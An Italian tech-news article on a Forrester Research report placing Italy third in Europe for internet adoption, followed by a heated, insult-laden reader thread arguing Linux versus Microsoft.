L'Italia è il terzo paese internet in Europa

Che vuol dire? Secondo Forrester Research questo significa che il numero di utenti che si collega alla rete rispetto al totale della popolazione ha superato una quota critica, che pone il nostro paese ai vertici nel Vecchio Continente


Roma – Per anni si è avuto modo di lamentarsi delle politiche tariffarie che hanno penalizzato la connettività ad internet e dunque l’uso della rete eppure, secondo i dati rilevati da uno dei più autorevoli osservatori sul settore, quello di Forrester Research, l’Italia è il terzo paese per diffusione di internet in Europa.

Forrester Research ha preso l’Italia come caso straordinario perché in controtendenza nel meridione d’Europa, dove più difficoltoso è stato fin qui lo sviluppo della rete.

Il rapporto di Forrester – “Italy Jumps Europès North-South Divide” – parte dalla considerazione che sarebbero ben 18 milioni gli adulti italiani che si connettono abitualmente alla rete. Cifre che non comprendono quindi quella parte di utenti che non ha ancora raggiunto la maggiore età. Un dato decisamente sorprendente se si considera che solo poche settimane fa Onetone in collaborazione con Doxa aveva realizzato uno studio secondo cui gli italiani sopra i 15 anni che si collegano ad internet almeno una volta al mese nel gennaio del 2002 non superava quota 9,5 milioni. Una tale differenza nel “conteggio” che non sembra poter essere giustificata dai diversi metodi di rilevazione.

Ad ogni modo, secondo Forrester l’Italia proviene da mesi in cui la diffusione dell’accesso è aumentato esponenzialmente. Nell’ultimo semestre, spiegano gli esperti dell’osservatorio, si è avuto un aumento del 9 per cento nel numero dei collegati adulti, un dato che viene considerato un “balzo”.

“Se la Scandinavia e la Svizzera sono ancora avanti – sostiene Forrester – l’Italia sta colmando la distanza con un secondo anno di crescita rapida”. Un balzo, dunque, che ha consentito di scavalcare la Francia in quanto a numero di utenti internet rispetto al totale della popolazione.

“Sono ormai lontani i tempi del secondo trimestre del 2000 – scrivono i ricercatori – in cui l’Italia soffriva di una diffusione della rete limitata al 13 per cento”. Un ruolo importante in questa crescita lo giocano anche i cellulari e più in generale la connettività wireless che sta conoscendo secondo Forrester un rapido sviluppo nel nostro paese. In particolare negli ultimi due trimestri del 2001 le analisi degli esperti parlano di un aumento dal 78 all’87 per cento nell’uso delle tecnologie wireless e dal 47 al 58 per cento nell’uso del personal computer nelle famiglie.

La crescita nell’uso delle nuove tecnologie, considerata “esponenziale”, secondo Forrester si traduce in una promessa per l’aumento del volume di affari del commercio elettronico, un settore che fino a questo momento in Italia ha dovuto soffrire, collocandosi ad un livello molto inferiore rispetto alle medie europee. Solo l’11 per cento degli italiani, infatti, ha effettuato acquisti sulla rete mentre la media dei cittadini europei è del 32 per cento.

Alcuni dei dati forniti da Forrester in questo senso ricordano, pur con alcune differenze, quelli di cui ha di recente parlato l’Istat , l’istituto italiano di statistica. L’Istat aveva infatti disegnato una mappa non incoraggiante per quanto riguarda l’adozione dell’e-commerce persino nelle imprese mentre aveva promosso a pieni voti la diffusione del personal computer, considerata però “non sufficiente”.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    Che icona!!!
    Mio Dio..se c'e' una cosa che mi fa impazzire di P.I. e' l'icona che viene associata alla news ..Cristo, quest'ultima e' fantastica! :)ma chi le disegna?
    • Anonimo scrive:
      Re: Che icona!!!
      - Scritto da: alaxa
      Mio Dio..se c'e' una cosa che mi fa
      impazzire di P.I. e' l'icona che viene
      associata alla news ..
      Cristo, quest'ultima e' fantastica! :)
      ma chi le disegna?Ciao!c'e' scritto in fondo ad ogni pagina eh !!! sempre lo stesso da 5 anni...peccato che ho scoperto troppo tardi che in Italia, tanto per farsi riconoscere come al solito, Monster Inc è diventato Monster & Co.ma si capisce lo stesso :)ciao!
  • Anonimo scrive:
    Impegnamoci personalmente
    Visto che dove ci sono interessi economici ci sono aziende come M$ che limitano le liberta' e boicottano la diffusione di un sistema libero per per concetto (non solo perche' non si paga ma per la sua stessa filosofia) come Linux, un grosso contribuno che tutti possiamo dare per dire NO a questi atteggiamenti potrebbe essere quello di coinvincere amici ad installare linux magari dandogli anche una mano di persona.Se ogni nuovo utente Linux dimostra la validita di questo sistema ad un amico utente widows (che a volte non sa che quella porcheria di SO che usa non e' l'unico SO esistente) convincendolo a provare un alternativa, la M$ avra' gli anni contati.
    • Anonimo scrive:
      Re: Impegnamoci personalmente
      - Scritto da: iono
      Visto che dove ci sono interessi economicici sono anche dietro linux infatti gpl = ricchezza
    • Anonimo scrive:
      Re: Impegnamoci personalmente
      - Scritto da: iono
      Visto che dove ci sono interessi economici
      ci sono aziende come M$ che limitano le
      liberta' e boicottano la diffusione di un
      sistema libero per per concetto (non solo
      perche' non si paga ma per la sua stessa
      filosofia) come Linux, un grosso contribuno
      che tutti possiamo dare per dire NO a questi
      atteggiamenti potrebbe essere quello di
      coinvincere amici ad installare linux magari
      dandogli anche una mano di persona.Certo. E se non lo fanno magari gli spacchiamo le finestre a sassate e gli diamo fuoco alla macchina (a Genova c'erano un sacco di amici che lo facevano...)
      Se ogni nuovo utente Linux dimostra la
      validita di questo sistema ad un amico
      utente widows (che a volte non sa che quella
      porcheria di SO che usa non e' l'unico SO
      esistente) convincendolo a provare un
      alternativa, la M$ avra' gli anni contati.Se volete un'alternativa a Windows, provateci con Mac. Magari avrete la vita più semplice. Prima che quell'emulazione di SO riesca ad arrivare al livello di Windows e Mac ce ne passa...
      • Anonimo scrive:
        Re: Impegnamoci personalmente
        - Scritto da: Darth Vader
        Magari avrete la vita più
        semplice. Prima che quell'emulazione di SO
        riesca ad arrivare al livello di Windows e
        Mac ce ne passa...Se tu non sei in grado di usare GNU Linux questo non vuol dire che sia un SO scadente.E' ora che gli utonti diventino utnti consapevoli, e' squallido che tutto si debba solo e per forza fare a colpi di click.Originale anche la tua definizione linux quale 'emulazione di SO'. Forse e' il contrario, ci sono dei buoni emulatori di Windows che girano su GNU Linux
      • Anonimo scrive:
        Re: Impegnamoci personalmente
        e per sfogare la tua indicibile voglia di trollaggio hai tirato in ballo anche Genova? sei caduto veramente in basso......ma per favore, non scherzare su queste cose! sono un po' più serie delle nostre beghe... lo capisco anch'io che probabilmente sono molto più giovane di te!ciaogodz
  • Anonimo scrive:
    Centesimi rossi
    Allora, il fatto risiede a quando l'attuale CEO Microsoft (il successore di zio Bill) si scagliò contro Linux e disse:Linux è un sistema mutante.Linux è un sistema antiamericano.Il primo era perchè onestamente Linux viene in tante distribuzioni mentre Windows esce in una sola distribuzione (Red Minestra :).La seconda perchè, si pensa (nessuno ha mai capito bene il perchè) gli USA si basano sul modello della libera iniziativa, del commercio e della vendita; un modello cooperativo in buona parte gratuito e dove chiunque può partecipare viene visto come comunista, ovvero rosso (ricordiamo che negli USA il comunismo è praticamente reato).Per il resto io uso BSD e vi frego.Riguardo al kernel di Linux (visto che è un argomento dibattuto) passare ad un modello a moduli (e librerie linkate) più simile a Windows porterebbe ad una perdita in velocità ma si avrebbe una maggiore upgradabilità; per il resto la colpa NON E'DI LINUX in se ma dei produttori taiwanesi che sviluppano driver per windows mentre quelli per linux se li devono fare i poveri utenti linux (beh, per lo meno nel 98% dei casi)...
  • Anonimo scrive:
    Re: Sono tutte cavolate
    - Scritto da: Tux
    Infatti l'utente
    "medio" (e ce ne sono molti) non saprebbe
    distinguere bene un guasto hardware da uno
    software, e il suo primo pensiero sarebbe
    "Ah, questi computer Compaq non funzionanoL'utente medio si è districato con interfacce caotiche come win3.x e accrocchi impossibili (come per la gestione della memoria), poi si è allenato installando e rimuovendo e reinstallando win95 a ripetizione, fino a passare notti insonni cercando di capire perchè NT dava blue screen sin dall'installazione.L'utente medio è un campione olimpico, per lui linux e la sua interfaccia è una passeggiata.Per l'utente novellino credo anch'io che l'interfaccia di XP è più semplice. È totalmente a prova di scimmia.., ma questo non vuol dire che in qualche modo la RH (Kde o Gnome in genere) possa essere un ostacolo, anzi.bye!
  • Anonimo scrive:
    Lacrime...
    E' una cosa che sto notando sempre più spesso; quando si parla di Microsoft vs Linux per sostenitori di quest'ultima frangia tutte le occasioni sono buone per piangere(MS è monopolista, viva la libertà, lotta al sistema capitalistico.....)Sarei curioso di sapere quanti su questo forum hanno abbraciato la causa OS contribuendo in modo attivo allo sviluppo di qualche applicativo.Quanti di voi hanno sviluppato anche una routine di OpenOffice o di Mozilla?Il mio dubbio è che difendete la causa perchè e di moda farlo ma per voi non esiste differenza tra open source e freeware.Spero di sbagliarmi ma l'aria che tira mi sembra porprio quellaNella speranza di essermi sbagliato Vi saluto
    • Anonimo scrive:
      Re: Lacrime...
      - Scritto da: mp75

      E' una cosa che sto notando sempre piu'
      spesso; quando si parla di Microsoft vs
      Linux per sostenitori di quest'ultima
      frangia tutte le occasioni sono buone per
      piangere(MS Monopolista, viva la liberta'
      lotta al sistema capitalistico.....)E chi piange? Mi pare che Linux stia andando bene.Non mi suicido certo perche' Linux non e' in ogni computer e Bill Gates non e' un mendicante.

      Sarei curioso di sapere quanti su questo
      forum hanno abbraciato la causa OS
      contribuendo in modo attivo allo sviluppo di
      qualche applicativo.sto sviluppando con degli amici un interprete BASIC.
      Quanti di voi hanno sviluppato anche una
      routine di OpenOffice o di Mozilla?Eh... magari conoscessi cosi' bene il C.

      Il mio dubbio e' che difendete la causa
      perche' e' di moda farlo ma per voi non esiste
      differenza tra open source e freeware.Oddio, non esiste. Diciamo che se e' free e' meglio.

      Spero di sbagliarmi ma l'aria che tira mi
      sembra porprio quellasara'. Per conto mio, no.
      • Anonimo scrive:
        Re: Lacrime...
        - Scritto da: Blackstorm
        sto sviluppando con degli amici un
        interprete BASIC.interessante, almeno dal punto di vista didattico.Hai mica un link ?
        Eh... magari conoscessi cosi' bene il C.idem... pero' sto provando a studiarmi bene come si lavora sotto kde.

        Il mio dubbio e' che difendete la causa

        perche' e' di moda farlo ma per voi non
        esiste

        differenza tra open source e freeware.
        Oddio, non esiste. Diciamo che se e' free e'
        meglio.sviluppare opensource non vuol dire "no al capitalismo". Personalmente ho sviluppato e sviluppo roba opensource, alcuna per scopi di ricerca, altra per scopi commerciali. Quest'ultima me la sono fatta pagare. Certo, non sono un'azienda, sono un freelance, ma dal momento in cui un cliente mi chiede un applicativo e io glielo sviluppo, glielo concedo sotto la licenza che tuteli al massimo il suo diritto di consumatore del mio prodotto e il mio diritto di creatore del suo prodotto.

        Spero di sbagliarmi ma l'aria che tira mi

        sembra porprio quella
        sara'. Per conto mio, no.nemmeno per conto mio. Penso che ci sia ancora molto da fare su linux per renderlo un sistema al meglio delle sue caratteristiche. Di lavoro da fare ce n'e'... e darei una palla per programmare come wietse venema... ma purtroppo devo accontentarmi e studiare, studiare, studiare sorgenti di altri, cercando di capire come si programma bene.
    • Anonimo scrive:
      Re: Lacrime...
      - Scritto da: mp75
      Nella speranza di essermi sbagliato Vi salutoTi sei sbagliato.bzzz riprova e sarai piu' fortunato.
    • Anonimo scrive:
      Re: Lacrime...
      Razza di anguilla!- Scritto da: mp75
      E' una cosa che sto notando sempre più
      spesso; quando si parla di Microsoft vs
      Linux per sostenitori di quest'ultima
      frangia tutte le occasioni sono buone per
      piangere(MS è monopolista, viva la libertà,
      lotta al sistema capitalistico.....)lotta al MONOPOLIO, furbacchione di questopar de byte... non lotta al sistemacapitalistico! la gente come te la fa diventare una cosapolitica come "comunisti contro capitalisti"anziche` "monopolio contro liberta` di scegliere"e "libero mercato contro cartello ditangentisti"
      Sarei curioso di sapere quanti su questo
      forum hanno abbraciato la causa OS
      contribuendo in modo attivo allo sviluppo di
      qualche applicativo.abbraciato?utilizzarlo ed aiutare chi lo vuoleusare ti pare poco?
      Quanti di voi hanno sviluppato anche una
      routine di OpenOffice o di Mozilla?ecco qua, se uno non ha sviluppatoper OpenOffice non ha diritto adusare software opersource?sei uno di quelli che pensa che linuxe` solo per smanettoni haker (come dicequalche espertone) che non hanno vogliadi lavorare...
      Il mio dubbio è che difendete la causa
      perchè e di moda farlo ma per voi non esiste
      differenza tra open source e freeware.pezzo di troll, opensource non vuol diresoftware gratis...
      Spero di sbagliarmi ma l'aria che tira mi
      sembra porprio quellasmettila di fumare allora
      Nella speranza di essermi sbagliato Vi salutoma va...Pino Silvestrel1vo8f1yv9hw08a001@sneakemail.com
      • Anonimo scrive:
        Re: Lacrime...
        Caro il mio pino Silvestre non capisco questo tuo post polemico; la mia voleva essere la spiegazione di una sensazione che avverto leggendo questo forumIo di lavoro faccio il sistemista MVS e pensate un pò sul mio PC non ho neanche il mouse(non mi serve!).Linux e Unix per come la vedo io non sono affatto complessi(infatti in una partizione del mio PC è installato Linux) ma come ben sai la cultura media informatica è assai bassa.Prima di accusare qualcuno di trollare leggi con attenzione e poi rileggilo ancora e metti da parte la tua insolenza che magari cosi' riesci a imparare qualcosa.PS Conosco la differenza tra OS e freeware a differenza di molti utilizzatori di UNIX.
    • Anonimo scrive:
      Re: Lacrime...
      - Scritto da: mp75

      E' una cosa che sto notando sempre più
      spesso; quando si parla di Microsoft vs
      Linux per sostenitori di quest'ultima
      frangia tutte le occasioni sono buone per
      piangere(MS è monopolista, viva la libertà,
      lotta al sistema capitalistico.....)

      Sarei curioso di sapere quanti su questo
      forum hanno abbraciato la causa OS
      contribuendo in modo attivo allo sviluppo di
      qualche applicativo.
      Quanti di voi hanno sviluppato anche una
      routine di OpenOffice o di Mozilla?

      Il mio dubbio è che difendete la causa
      perchè e di moda farlo ma per voi non esiste
      differenza tra open source e freeware.

      Spero di sbagliarmi ma l'aria che tira mi
      sembra porprio quella

      Nella speranza di essermi sbagliato Vi saluto
      Purtroppo va sempre a finire così.Chi usa(?!) windows non capisce che senso abbia rinunciare ad un sistema perfetto, dove trovi tutto il software (il piu' delle volte piratato) che si installa da solo, che non ha bisogno di configurazioni particolari, che basta cliccare qua' e la' per farlo funzionare, e che puo' usarlo anche una scimmia.Chi usa Linux, invece, usava Windows, ma ha _deciso_ di smettere.E qui ognuno ha le sue, piu' che leggittime, ragioni. Ma c'e' chi usa Linux dicendo: "Linux=software gratis".Questi anche se non usano Linux e' lo stesso.C'e' anche il fatto che molti sostenitori di software proprietario sbandierano le straordinarie doti di un SO e di un'applicazione (sempre della stessa azienda) che, pero', non hanno pagato. Francamente rispetto piu' una persona che si sbatte a documentarsi per imparare ad usare un sistema operativo (Linux), cercando di usare tutto quello che viene messo a disposizione (liberamente e legalmente utilizzabile) dalla comunita', piuttosto di uno che usa software proprietario ma piratato.Sinceramente non vedo cause da abbracciare ma solo cose da imparare. L'importante e' che ognuno decida di testa sua. CiaoFabio
    • Anonimo scrive:
      Re: Lacrime...

      Il mio dubbio è che difendete la causa
      perchè e di moda farlo ma per voi non esiste
      differenza tra open source e freeware.Io il mio Linux l'ho acquistato.
  • Anonimo scrive:
    Re: Sono tutte cavolate
    sono d'accordo: per quanto sia un sostenitore di del free software in generale e di linux in particolare, devo ammettere che Linux non è ancora pronto a soppiantare Windows nel mercato desktop. del resto lo ha detto lo stesso Linus Torvalds che ci vorranno almeno 10 anni prima che avvenga la vera e propria svolta (mi riferisco a un vecchio numero di Linux&C., non conosco la fonte originale). tuttavia, penso che certe politiche, oltre ad essere poco apprezzabili eticamente, non fanno altro che rallentarne la diffusione e quindi la conoscenza all'utenza. molto spesso uno vorrebbe provare ad usare un altro sistema ma non sa nemmeno che esiste...!la nuova politica commerciale di Microsoft: la negazione dell'evidenza!ciaogodz
  • Anonimo scrive:
    lotta ai monopolisti imperialisti
    lotta ai monopolisti imperialistiSolo dei ragazzini ignoranti e manager esaltatipossono scegliere volontariamente di abbracciarel'imperialismo della microsoft, abbindolatidal marketing.Chi parla male di linux sicuramente non l'ha maiutilizzato.L'ignoranza dilaga, in TV non c'e` piu`cultura, si riduce la spesa per la ricercascientifica e nessuno dice niente, mentre seun calciatore ultrapagato canna un tiroscoppiano putiferi, sprange, scazzottamenti,danni...italiani, siamo un popolo di ignoranti, abbiamopolitici ignoranti, ce lo meritiamo, io vorreisapere con questi dannati presupposti quanto puo`essere oculata la scelta di regalare i dati deiministeri della pubblica amministrazione allamicro$oft in cambio di tangenti.Pian pianino i grossi capitali sono riusciti amettere fuori uso anche Di Pietro, hannosmantellato il pool di mani pulite, e ci culliamonelle false statistiche della forresterresearch senza renderci conto che in quasi tuttii PC italiani NON C'E` software italiano, ese micro$$$oft decide di triplicare il prezzodi office noi italiani siamo chinati a 90gradi pronti a farci sodomizzare ovviamentepagando con i soldi pubblici.Manca la competenza, la gente usa micro$oftperche` e` stupida, ignorante, non ha edassolutamente non vuole avere la competenzanecessaria fosse solo per distinguere tra unvirus ed un malfunzionamento di un programma.Pochi qui si rendono conto di cosa voglia dire cheMicro$$oft detiene il copyright dei formaticon cui sono conservati i LORO dati.IGNORANTI IGNORANTI IGNORANTI Pino Silvestre
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti
      - Scritto da: Pino Silvestre
      lotta ai monopolisti imperialisti

      Solo dei ragazzini ignoranti e manager
      esaltati
      possono scegliere volontariamente di
      abbracciare
      l'imperialismo della microsoft,
      abbindolati
      dal marketing.Infatti i prodotti di M$ sono prodotti commerciali. Li vendono se qualcuno li compra.Qualcuno li compra perchè li può usare senzadiventare un "Rocket Scientist".
      Chi parla male di linux sicuramente non
      l'ha mai
      utilizzato.Io l'ho utilizzato, lo utilizzo (tanto), nonostante questo ho una pessima opinione relativamente a grande parte della fuffache si trova in una distribuzione mediae nel modello di sviluppo.
      L'ignoranza dilaga, in TV non c'e`
      piu`
      cultura, si riduce la spesa per la
      ricerca
      scientifica e nessuno dice niente,
      mentre se
      un calciatore ultrapagato canna un
      tiro
      scoppiano putiferi, sprange,
      scazzottamenti,
      danni...Ahemm, Linux (il kernel) non mi pare un fulgido esempio di innovazione da ricerca scientifica.E' un ottimo esempio di manutenzione adattativa.
      italiani, siamo un popolo di ignoranti,
      abbiamo
      politici ignoranti, ce lo meritiamo, io
      vorrei
      sapere con questi dannati presupposti quanto
      puo`
      essere oculata la scelta di regalare i
      dati dei
      ministeri della pubblica amministrazione
      alla
      micro$oft in cambio di tangenti.Ed allora licenziamo tutti i dipendentied al loro posto mettiamo dei nuovi assuntiche come prerequisito sappiano ricompilareun kernel Linux :-)
      i PC italiani NON C'E` software
      italianoPerchè, Linux è Italiano?
      IGNORANTI IGNORANTI IGNORANTI
      Pino SilvestreScusa Pino Silvestre, posso capireche oggi tu abbia avuto una giornataccia,ma di rendo noto che, normalmente, chi usa uno strumento, non conosce i dettagli di costruzione ed i principi fisici che ne determinano il funzionamento.
      • Anonimo scrive:
        Re: lotta ai monopolisti imperialisti
        - Scritto da: Mario Rossi
        - Scritto da: Pino Silvestre

        lotta ai monopolisti imperialisti



        Solo dei ragazzini ignoranti e manager

        esaltati

        possono scegliere volontariamente di

        abbracciare

        l'imperialismo della microsoft,

        abbindolati

        dal marketing.

        Infatti i prodotti di M$ sono prodotti
        commerciali. Li vendono se qualcuno li
        compra.
        Qualcuno li compra perchè li può usare senza
        diventare un "Rocket Scientist".e` sufficiente usare Outlooke dare la propria posta ed i propridocumenti in pasto a mezza internetal primo virus,e glissi come uno sciacquone sulla folliadi tenere i propri dati (si trattadi lettere e presentazioni) in formatoproprietario; non c'e` bisogno di essere Rocket Scientist per tenere i dati in formati aperti o rifiutarsidi pubblicare i .doc sui siti dei ministeri

        Chi parla male di linux sicuramente non

        l'ha mai

        utilizzato.
        Io l'ho utilizzato, lo utilizzo (tanto),
        nonostante questo ho una pessima opinione
        relativamente a grande parte della fuffa
        che si trova in una distribuzione media
        e nel modello di sviluppo.questa e` una cauna grandissima cazzaincredibile, insostenibile ca$$ateeeese TU hai usato linux io sono napoleone bonaparte

        L'ignoranza dilaga, in TV non
        c'e`

        piu`

        cultura, si riduce la spesa per la

        ricerca

        scientifica e nessuno dice niente,

        mentre se

        un calciatore ultrapagato canna
        un

        tiro

        scoppiano putiferi, sprange,

        scazzottamenti,

        danni...
        Ahemm, Linux (il kernel) non mi pare un
        fulgido esempio di innovazione da ricerca
        scientifica.
        E' un ottimo esempio di manutenzione
        adattativa.ti sei visto i sorgenti?No?Allora parli a membro di cane

        italiani, siamo un popolo di ignoranti,

        abbiamo

        politici ignoranti, ce lo meritiamo,
        io

        vorrei

        sapere con questi dannati presupposti
        quanto

        puo`

        essere oculata la scelta di regalare i

        dati dei

        ministeri della pubblica
        amministrazione

        alla

        micro$oft in cambio di tangenti.
        Ed allora licenziamo tutti i dipendenti
        ed al loro posto mettiamo dei nuovi assunti
        che come prerequisito sappiano ricompilare
        un kernel Linux :-)no, licenziamo chi non sa distinguereun virus o un attacco hacker da un programma malfunzionante e bacato

        i PC italiani NON C'E` software

        italiano
        Perchè, Linux è Italiano?no. questo e` segno dell'ignoranza che CI portiamo sul groppone illusi di essere tecnologicamente avanzati

        IGNORANTI IGNORANTI IGNORANTI

        Pino Silvestre
        Scusa Pino Silvestre, posso capire
        che oggi tu abbia avuto una giornataccia,
        ma di rendo noto che, normalmente, chi usa
        uno strumento, non conosce i dettagli di
        costruzione ed i principi fisici che ne
        determinano il
        funzionamento.hai posto argomentazioni zero, come tanta gente che scrivefuffa pro-micro$oftPino Silvestre
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          - Scritto da: Pino Silvestre

          relativamente a grande parte della fuffa

          che si trova in una distribuzione media

          e nel modello di sviluppo.
          incredibile, insostenibile ca$$ateeeeNeghi forse che molte distribuzioni siano piene di fuffa e che il kernel sia gestito come il bar sotto casa?
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          tu sei quello che mesi addietro voleva denunciare i propri clienti che, probabilmente ignari, gli avevano inviato un virus ? che si "dichiarava" avvocato?Mi sa che i pinguini li hai solo visti passare in foto pubblicitarie
          • Anonimo scrive:
            Re: lotta ai monopolisti imperialisti
            - Scritto da: udox
            tu sei quello che mesi addietro voleva
            denunciare i propri clienti che,
            probabilmente ignari, gli avevano inviato un
            virus ? che si "dichiarava" avvocato?
            Mi sa che i pinguini li hai solo visti
            passare in foto pubblicitariesono quello che dichiara chei detrattori di linux usano argomentazioni ridicole a favore dell'adozione di Micro$oft,anche se fa software piu` bacatodegli altri ed in maniera piu` graveperche` la politica closed sourcenon stimola nessuno a migliorare ilprodotto per il vantaggio di unsolo monopolista.Pino Silvestre
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          - Scritto da: Pino Silvestre

          Ahemm, Linux (il kernel) non mi pare un

          fulgido esempio di innovazione da ricerca

          scientifica.

          E' un ottimo esempio di manutenzione

          adattativa.
          ti sei visto i sorgenti?
          No?e tu pino ? te li sei visti ?io li ho visti, e da programmatore con un minimo di esperienza dico che, almeno dal punto di vista della chiarezza e del coding style, sono buoni.Per caso ho avuto modo di vedere il coding style del notepad sul sito msdn, e li' si' che mi e' venuto il vomito.


          i PC italiani NON C'E` software


          italiano

          Perchè, Linux è Italiano?
          no. linux (il kernel) e' anche italiano. Un certo Andrea Arcangeli ti dice qualcosa?Linux (il software) e' anche italiano. Un certo Simo Sorce (samba), un certo Paolo Molaro (Mono e gnome) ti dicono qualcosa ? un certo Szymon Stefanek ti dice qualcosa (e' italiano nonostante il nome) ?... e mi scuso con chi non ho nominato, ma vado di fretta.
          • Anonimo scrive:
            Re: lotta ai monopolisti imperialisti
            Muneh... non devi dirlo a pino.. penso che in questo caso stesse difendendo linux.. :)
          • Anonimo scrive:
            Re: lotta ai monopolisti imperialisti
            - Scritto da: Foxie
            Muneh... non devi dirlo a pino.. penso che
            in questo caso stesse difendendo linux.. :)
            se uno difende linux con delle inesattezze, il solo fatto che difenda linux non lo trasforma nella verita' divina, ergo mi permetto di controbattere.
          • Anonimo scrive:
            Re: lotta ai monopolisti imperialisti
            [discussione sulle origini dei sorgentidi linux]- Scritto da: munehiro
            - Scritto da: Foxie

            Muneh... non devi dirlo a pino.. penso che

            in questo caso stesse difendendo linux..
            :)
            se uno difende linux con delle inesattezze,
            il solo fatto che difenda linux non lo
            trasforma nella verita' divina, ergo mi
            permetto di controbattere.mune, sono sempre felice di leggere i tuoi interventi...io non parlavo dell'italianita`del kernel, mi riferivo a quelladell'alfabetizzazione su internet,alla massa di scimmiette nella pubblica amministrazioneche non sono capaci di distinguereun programma bacato o insicuro daun virus o da un attacco mirato di piratida un penetration test, o piu` semplicemente distinguere da software piratato a software opensource.non sono le punte di diamante chemancano in Italia, e` che il restodei chiodi e` fatto di ferro scadentePino Silvestrel1vo8f1yv9hw08a001@sneakemail.com
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          - Scritto da: Pino Silvestre
          se TU hai usato linux
          io sono napoleone bonaparteMi sa che tu invece sei quel Troll che qualchetempo fa usava firmarsi ALIEN.
          ti sei visto i sorgenti?Si.Sai, mica sei l'unico che possiedeun CD con dentro Linux e che sa leggerein listato in C.
          hai posto argomentazioni zero,
          come tanta gente che scrive
          fuffa pro-micro$oftChi ha posto argomentazioni a zero carbonellasei tui. Non capendo un'accadi quello che ho scritto hai replicato dicendo una marea di C....tee ne vai pure fiero. Sei da ammirare.
      • Anonimo scrive:
        Re: lotta ai monopolisti imperialisti
        - Scritto da: Mario Rossi
        Infatti i prodotti di M$ sono prodotti
        commerciali. Li vendono se qualcuno li
        compra.non solo: anche perché attuano strategie commerciali (anche "sporche") per venderne di più e spillare più soldi
        Qualcuno li compra perchè li può usare senza
        diventare un "Rocket Scientist".qusta è una banalità senza senso: li comprano perché nelle scuole, nei corsi improvvisati di informatica, insegnano a pigiare il pulsante con la stampantina, a fare i grassetti e i corsivi e cazzate simili, spacciando il tutto per "Lezione di informatica"... e sempre e solo su MSOffice

        Chi parla male di linux sicuramente non

        l'ha mai

        utilizzato.
        Io l'ho utilizzato, lo utilizzo (tanto),
        nonostante questo ho una pessima opinione
        relativamente a grande parte della fuffasi, c'è anche della fuffa
        che si trova in una distribuzione media
        e nel modello di sviluppo.il modello di sviluppo è fra i più efficienti mai provati
        Ahemm, Linux (il kernel) non mi pare un
        fulgido esempio di innovazione da ricerca
        scientifica.stica%%i...
        E' un ottimo esempio di manutenzione
        adattativa.
        i PC italiani NON C'E` software

        italiano
        Perchè, Linux è Italiano?si!è anche italiano: perfino nel kernel
      • Anonimo scrive:
        Re: lotta ai monopolisti imperialisti
        - Scritto da: Mario Rossi
        Infatti i prodotti di M$ sono prodotti
        commerciali. Li vendono se qualcuno li
        compra.
        Qualcuno li compra perchè li può usare senza
        diventare un "Rocket Scientist".per usare GNU/Linux mica devi essere un kernel hacker sai?
        Io l'ho utilizzato, lo utilizzo (tanto),
        nonostante questo ho una pessima opinione
        relativamente a grande parte della fuffa
        che si trova in una distribuzione media
        e nel modello di sviluppo.a parte che non sei obbligato ad installare tutti i pacchetti che trovi in una distro, ma poi se proprio vuoi una distro che ti soddisfi te la fai tu (Linux from scratch)
        Ahemm, Linux (il kernel) non mi pare un
        fulgido esempio di innovazione da ricerca
        scientifica.
        E' un ottimo esempio di manutenzione
        adattativa.concordo ma il punto non era se linux (il kernel) sia innovativo o meno.
        Ed allora licenziamo tutti i dipendenti
        ed al loro posto mettiamo dei nuovi assunti
        che come prerequisito sappiano ricompilare
        un kernel Linux :-)non si parlava di questo ma di adottare OS alternativi a win nella PA per ovvie ragioni
        Perchè, Linux è Italiano?sai chi e' Andrea Arcangeli?
        ma di rendo noto che, normalmente, chi usa
        uno strumento, non conosce i dettagli di
        costruzione ed i principi fisici che ne
        determinano il
        funzionamento.non e' necessario conoscere i dettagli di funzionamento di GNU/Linux per poterlo usare
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          - Scritto da: z2

          Perchè, Linux è Italiano?
          sai chi e' Andrea Arcangeli?Tu che dici?
          non e' necessario conoscere i dettagli di
          funzionamento di GNU/Linux per poterlo usareStrano, a sentire le fesserie di Pino Silvestresembrerebbe di si.Ecco, Linux dovrebbe fare a meno di supporterscome lui.
          • Anonimo scrive:
            BALLE! Re: lotta ai monopolisti imperialisti
            - Scritto da: Mario Rossi

            non e' necessario conoscere i dettagli di

            funzionamento di GNU/Linux per poterlo
            usare
            Strano, a sentire le fesserie di Pino
            Silvestre
            sembrerebbe di si.

            Ecco, Linux dovrebbe fare a meno di
            supporters
            come lui.mi attribuisci boiate che non ho mai detto; c'e` una bella differenzatra conoscere il kernel di linuxo essere un Rocket Scientist esemplicemente saper distinguere un readmeda un programma, o un messaggio in htmlda uno di testo..., o distinguere traun programma fatto a membro di caneda un PC sodomizzato da un virusPino Silvestre
        • Anonimo scrive:
          Re: lotta ai monopolisti imperialisti
          - Scritto da: z2
          non e' necessario conoscere i dettagli di
          funzionamento di GNU/Linux per poterlo usareprendi una segretaria e falle formattare un floppycon linux, poi le fai installare lo scanner e quindi scrivere un bel documento word-compatibiledopo essersi installata staroffice a pagamento e per concludere faglielo zippare.ciao.
          • Anonimo scrive:
            Re: lotta ai monopolisti imperialisti
            - Scritto da: asdf
            poi le fai installare lo scannereggia'... tutte le segretarie lo sanno fare.e soprattutto, lo fanno tutti i giorni
      • Anonimo scrive:
        Re: lotta ai monopolisti imperialisti
        - Scritto da: Mario Rossi
        Ahemm, Linux (il kernel) non mi pare un
        fulgido esempio di innovazione da ricerca
        scientifica.
        E' un ottimo esempio di manutenzione
        adattativa.Non sono affatto d'accordo... prova a comparare le feature di un kernel 2.0 con quelle di un 2.4Poi fai lo stesso paragone con tutti gli altri kernel unix che trovi in giro e dimmi chi presenta il maggior supporto a features "totali".Il fatto che poi linux sia un kernel architetturalmente "alla vecchia maniera" è una questione di scelte....Linux è fatto per funzionare bene, non per sperimentare voli pindarici in c.(avevo trovato un bel paper su una architettura di OS "totale"... se lo ritrovo mando il link...)
        • Anonimo scrive:
          OS Totale =
          lotta ai monopolisti imperialisti
          - Scritto da: skull
          - Scritto da: Mario Rossi


          Ahemm, Linux (il kernel) non mi pare un

          fulgido esempio di innovazione da ricerca

          scientifica.

          E' un ottimo esempio di manutenzione

          adattativa.

